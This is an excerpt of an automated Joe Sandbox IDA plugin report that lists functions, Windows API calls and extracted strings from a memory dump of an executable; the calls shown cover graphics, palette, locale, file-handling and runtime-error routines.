Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,070806DB,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,070806DB,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041FE50, Relevance: 21.1, APIs: 14, Instructions: 131

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041FE67
CreateCompatibleDC.GDI32(00000000), ref: 0041FE71
GetObjectA.GDI32(?,00000018,?), ref: 0041FE91
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0041FF9E,?,00000000,00000000), ref: 0041FEA8
GetDC.USER32(00000000), ref: 0041FEB4
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041FEE1
ReleaseDC.USER32(00000000,00000000), ref: 0041FF07

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

SelectObject.GDI32(?,?), ref: 0041FF22
SelectObject.GDI32(?,00000000), ref: 0041FF31
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041FF5D
SelectObject.GDI32(?,00000000), ref: 0041FF6B
SelectObject.GDI32(?,00000000), ref: 0041FF79
DeleteDC.GDI32(?), ref: 0041FF8F
DeleteDC.GDI32(?), ref: 0041FF98

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00407134, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 49

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0040714C
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407158
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407167
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407173
SendMessageA.USER32(?,?,00000000,00000000), ref: 004071AF

Strings

MouseZ, xrefs: 00407147
MSH_SCROLL_LINES_MSG, xrefs: 0040716E
MSH_WHEELSUPPORT_MSG, xrefs: 00407162
Magellan MSWHEEL, xrefs: 00407142
MSWHEEL_ROLLMSG, xrefs: 00407153

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00402A68, Relevance: 15.1, APIs: 10, Instructions: 129

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402AF0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B14
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B30
ReadFile.KERNEL32(?,?,00000080,?,00000000), ref: 00402B51
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402B7A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402B88
GetStdHandle.KERNEL32(000000F5), ref: 00402BC3
GetFileType.KERNEL32 ref: 00402BD9
CloseHandle.KERNEL32 ref: 00402BF4
GetLastError.KERNEL32(000000F5), ref: 00402C0C

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00409E60, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50

APIs

Part of subcall function 00409CD8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
Part of subcall function 00409CD8: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000,00000400), ref: 00409EA0
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?), ref: 00409EA6
GetStdHandle.KERNEL32(000000F5,00409F10,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000,00000400), ref: 00409EBB
WriteFile.KERNEL32(00000000,000000F5,00409F10,00000002,?), ref: 00409EC1
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 00409EE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00409EF9

Strings

\s@, xrefs: 00409ECF
H@F, xrefs: 00409E74

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040ACCC, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040AB58: GetThreadLocale.KERNEL32 ref: 0040AB82
Part of subcall function 0040AB58: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000004A), ref: 0040AC77
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040981C: GetThreadLocale.KERNEL32(00000000,0040992F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409838

GetThreadLocale.KERNEL32(00000000,0040AF97,?,?,00000000,00000000), ref: 0040AD02

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Part of subcall function 004097B8: GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 004097CB

Part of subcall function 00409AA4: GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 004099F4: GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000003,Function_00009940,00000000,00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A65
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(0040997C,00000000,00000000,00000003), ref: 00409A70

Strings

AMPM , xrefs: 0040AF25
m/d/yy, xrefs: 0040ADD1
mmmm d, yyyy, xrefs: 0040ADFE
:mm, xrefs: 0040AF35
:mm:ss, xrefs: 0040AF52
AMPM, xrefs: 0040AF16

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004225B8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041B680, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89

APIs

GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Strings

0@F, xrefs: 0041B68E
H#A, xrefs: 0041B6B2

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00401B18, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62

APIs

RtlEnterCriticalSection.KERNEL32(Function_000645C4,00000000,i ), ref: 00401B45
LocalFree.KERNEL32 ref: 00401B57
VirtualFree.KERNEL32(?,00000000,00008000,002DBAD0,00000000,i ), ref: 00401B76
LocalFree.KERNEL32 ref: 00401BB5
RtlLeaveCriticalSection.KERNEL32(Function_000645C4,00401BF5), ref: 00401BDE
RtlDeleteCriticalSection.KERNEL32(Function_000645C4,00401BF5), ref: 00401BE8

Strings

i , xrefs: 00401B2C

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004040B8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0045BD1C,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F,?,00000000), ref: 004040F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0045BD1C), ref: 004040F7
GetStdHandle.KERNEL32(000000F5,00404140,00000002,0045BD1C,00000000,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F), ref: 0040410C
WriteFile.KERNEL32(00000000,000000F5,00404140,00000002,0045BD1C), ref: 00404112
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404130

Strings

Error, xrefs: 00404124
Runtime error at 00000000, xrefs: 004040EA, 00404129

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420380, Relevance: 12.1, APIs: 8, Instructions: 79

APIs

GetDC.USER32(00000000), ref: 004203AE
GetDeviceCaps.GDI32(?,00000068), ref: 004203CA
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004203E9
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042040D
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042042B
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042043F
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042045F
ReleaseDC.USER32(00000000,?), ref: 00420477

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420970, Relevance: 10.7, APIs: 7, Instructions: 166

APIs

Part of subcall function 00420628: GetDC.USER32(00000000), ref: 00420672
Part of subcall function 00420628: CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004206B9
Part of subcall function 00420628: DeleteObject.GDI32(?), ref: 004206F4

GetObjectA.GDI32(?,00000018,?), ref: 00420A62
GetObjectA.GDI32(?,00000018,?), ref: 00420A71
GetBitmapBits.GDI32(?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?,?), ref: 00420AC2
GetBitmapBits.GDI32(?,?,?,?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?), ref: 00420AD0
DeleteObject.GDI32(?), ref: 00420AD9
DeleteObject.GDI32(?), ref: 00420AE2
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420B04

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00422B38, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00422B8A
MulDiv.KERNEL32(?,?,000009EC,?), ref: 00422BA1
GetDC.USER32(00000000), ref: 00422BB8
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 00422BDC
GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 00422C0F

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Strings

`, xrefs: 00422B70

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004231BC, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?), ref: 0042060E

GetDC.USER32(00000000), ref: 004231FA
CreateCompatibleDC.GDI32(?), ref: 00423206
SelectObject.GDI32(?), ref: 00423213
SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 00423237
SelectObject.GDI32(?,?), ref: 00423251
DeleteDC.GDI32(?), ref: 0042325A
ReleaseDC.USER32(00000000,?), ref: 00423265

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040C14C, Relevance: 9.1, APIs: 6, Instructions: 139

APIs

767E48F1.OLEAUT32(?), ref: 0040C17C
767EFFDA.OLEAUT32(?,00000001,?), ref: 0040C1E1
767EFF8E.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040C203
767F00CA.OLEAUT32(0000000C,?,?), ref: 0040C242

Part of subcall function 0040C00C: 767E3EAE.OLEAUT32(?,00000100,?,?,0040C9DE), ref: 0040C05B

767F0035.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040C2AD
767F0035.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040C2CC

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420880, Relevance: 9.1, APIs: 6, Instructions: 84

APIs

GetSystemMetrics.USER32(0000000B), ref: 004208CE
GetSystemMetrics.USER32(0000000C), ref: 004208DA
GetDC.USER32(00000000), ref: 004208F6
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042091D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042092A
ReleaseDC.USER32(00000000,00000000), ref: 00420963

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420CF0, Relevance: 9.1, APIs: 6, Instructions: 65

APIs

Part of subcall function 00420BA0: GetObjectA.GDI32(?,00000054), ref: 00420BB4

CreateCompatibleDC.GDI32(00000000), ref: 00420D12
SelectPalette.GDI32(?,?,00000000), ref: 00420D33
RealizePalette.GDI32(?), ref: 00420D3F
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00420D56
SelectPalette.GDI32(?,00000000,00000000), ref: 00420D7E
DeleteDC.GDI32(?), ref: 00420D87

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00425E92, Relevance: 9.1, APIs: 6, Instructions: 58

APIs

Part of subcall function 00425998: GetDC.USER32(00000000), ref: 0042599B
Part of subcall function 00425998: GetDeviceCaps.GDI32(00000000,0000005A), ref: 004259A5
Part of subcall function 00425998: ReleaseDC.USER32(00000000,00000000), ref: 004259B2

RtlInitializeCriticalSection.KERNEL32(00464A44), ref: 00425EAB
RtlInitializeCriticalSection.KERNEL32(00464A5C,00464A44), ref: 00425EB5
GetStockObject.GDI32(00000007), ref: 00425EBC
GetStockObject.GDI32(00000005), ref: 00425EC8
GetStockObject.GDI32(0000000D), ref: 00425ED4
LoadIconA.USER32(00000000,00007F00), ref: 00425EE5

Part of subcall function 00425A14: MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21
Part of subcall function 00425A14: MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Part of subcall function 0041DDD4: RtlInitializeCriticalSection.KERNEL32(?), ref: 0041DDEE

Part of subcall function 00425AE0: RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(?), ref: 00413F9B

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00420530, Relevance: 9.1, APIs: 6, Instructions: 55

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00420549
SelectObject.GDI32(00000000), ref: 00420552
GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
SelectObject.GDI32(00000000,00000000), ref: 00420572
DeleteDC.GDI32(00000000), ref: 00420578
CreatePalette.GDI32 ref: 004205BE

Part of subcall function 00420498: GetDC.USER32(00000000), ref: 004204B0
Part of subcall function 00420498: GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
Part of subcall function 00420498: GetPaletteEntries.GDI32(070806DB,00000000,00000008,?), ref: 004204E4
Part of subcall function 00420498: GetPaletteEntries.GDI32(070806DB,00000008,00000008,?), ref: 004204FC
Part of subcall function 00420498: ReleaseDC.USER32(00000000,?), ref: 00420518

Part of subcall function 00420328: GetSystemInfo.KERNEL32(?), ref: 00420338

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0041FC14, Relevance: 9.0, APIs: 6, Instructions: 43

APIs

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

UnrealizeObject.GDI32(00000000), ref: 0041FC20
SelectObject.GDI32(?,00000000), ref: 0041FC32
SetBkColor.GDI32(?,00000000), ref: 0041FC55
SetBkMode.GDI32(?,00000002), ref: 0041FC60

